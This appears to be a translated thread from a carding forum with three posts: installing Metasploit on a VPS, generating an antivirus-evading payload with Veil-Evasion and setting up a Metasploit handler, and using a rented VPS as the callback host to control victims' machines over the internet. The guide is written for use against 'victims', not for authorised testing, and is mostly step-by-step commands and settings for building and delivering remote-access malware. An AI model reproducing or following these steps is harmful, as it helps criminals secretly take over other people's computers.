Installing Metasploit on a VPS server

CarderPlanet

Professional
Messages
2,549
Reaction score
730
Points
113
d56befcbe6e18c96b29af.png

Hello everyone! Today we will be installing metasploit on a VPS server. As it turns out, this is a fairly straightforward process. Let's get started.

First, we need to get a server with at least 512 MB of RAM. Otherwise, the metasploit will not start.

Next, you need to download the necessary packages, this is done with a simple command:
Code:
apt-get -y install autoconf bison build-essential curl git-core libapr1 libaprutil1 libcurl4-devssl-dev libgmp3-dev libpcap-dev libpq-dev libreadline6-dev libsqlite3-dev libssl-dev libsvn1 libtool libxml2 libxml2-devx -dev locate ncurses-dev openssl wget xsel zlib1g zlib1g-dev

Next, download the installer itself from the metasploit
Code:
git clone  https://github.com/iam1980/metasploit-vps-installer.git

If the command does not work, then download git (apt-get install git)

Next, go to the directory with the installer
Code:
cd metasploit-vps-installer

Run the installer itself
Code:
bash msf_root.sh

The installation process will begin. If errors related to bundler suddenly appear, then run the following command
Code:
apt-get install gem

and one more
Code:
gem install wirble sqlite3 bundler


After that, the metasploit-framework folder will appear in the root directory

By entering it and registering ./msfconsole, we will launch the metasploit
 
Veil-Evasilion и Metasploit

69846bb87da561fbe1bca.png


Well, it's time for a serious hack. Today I will tell you about the Veil Evasion framework.

This wonderful program is capable of creating a virus that does not burn with an antivirus, when launched on the hacker's computer, full access to the infected machine will appear.

Intrigued? Then let's get started!

First you need to install any Linux distribution on your computer, but I recommend Kali Linux. Then you will understand why.

Open the terminal and write the command "git clone https://github.com/Veil-Framework/Veil-Evasion.git" in it (naturally without quotes)

A folder called Veil Evasion will be downloaded to our computer. We go into it using the command "cd Veil-Evasion", then into the setup folder

using the command "cd setup" and write the most important command: "./setup.sh" (WITHOUT QUOTES)

The installation process will begin, during which you must agree with everything, by entering the letter "Y" or installing different programs,

for example Python and many more. I warn you right away - the process is quite long, and when it will seem that the installation is frozen

we must continue to wait.

After successful installation go to the Veil-Evasion folder and write "./Veil-Evasion.py"

Your terminal turns into a window for creating a future virus. You need to write the command "list", and you will see absolutely

all available viruses, but we only need one. We write "use 32" and start configuring the virus.

Immediately write the command "set USE_PYHERION Y" and press enter. It is important to note - You must write strictly

in large letters, otherwise nothing will come of it. Further more interesting, we need to find out our ip address in the network in which we are now.

Now I will analyze an example of an attack on a local network, but if this post gets a lot of likes, then I will tell you about an attack across the entire network.

With the "ifconfig" command entered in another terminal, we find out our local ip. It will be opposite the network adapter you are using, namely wlan0.

it usually looks like 192.168.1.4. After that, in the window where we create the virus, write "set LHOST YOUR IP ADDRESS".

That is, if my ip was 192.168.1.5, then I would write the following: "set LHOST 192.168.1.5" (WITHOUT QUOTES).

After all this, our virus is almost ready, it remains to write "generate". We will be asked to enter the name of our virus. Write, but only in English.

It is important. After that, enter the number 1 and wait. When the generation is over, the path to the created virus will be highlighted in green.

We copy it without the name of the virus itself and go to this folder using the cd command. Typically, you would enter the following "cd / usr / share / veil-output / compiled".

In the folder there will be an exe file, it is it that must be run on the victim's computer. But you must somehow manage the captured PC!

For this, Cali Linux has the Metasploit program. Most other Linux distributions do not have it, and you will have to install it yourself.

It is invoked using the "msfconsole" command in the terminal. After loading (30 seconds) You need to do the following:

In the window in which we created the virus there is a column "Handler File". We copy what is in it and in the window with Metasploit

we write: "resource WHAT WE COPYED", that is, something like this "resource /usr/share/veil-output/handlers/payload_handler.rc"

Now all that remains is to launch our virus on another PC, and in the Metasploit window we will be able to control it. I will tell you how to do this in other articles.
 
Metasploit via the Internet or what to do if mom doesn't let her out on the street

86b22f84ec07ea4d2d73b.jpg


Hello everyone, this is a logical continuation of the article about the legendary METASPLOIT. Today I will describe a diagram of how you can carry out an attack across the entire Internet. Many people say: "Forward ports on the router and set up dynamic DNS" but I think this is an unrealistic haemorrhoid. Every now and then, something may not work for you, and at the decisive moment it can affect everything. The main thing that stops us from hacking across the entire network is that most of us don't have a static ip. Who does not know, when the router is rebooted, our ip address changes, and we have only one opportunity to specify it when creating a virus. However, there is a way out besides dancing with DNS and forwarding ports. We need to buy a VPS server. Renting it will not cost much ($ 4-8 per month). Who does not know, VPS is something like a computer that is running on a remote server. The advantage of such a server is its static ip. Plus, you can connect to it via SSH and install our beloved Kali Linux on it. Let's get down to practice.

When creating a malicious program, the server ip must be specified in the LHOST parameters. You can use any port convenient for you. In principle, now it is enough to just run the malicious program on the victim's PC and that's it, we have full access to it without leaving the cozy armchair at home.
Next time I will tell you how to gain a foothold in the victim system.

Good luck to everyone, bye everyone!
 
Top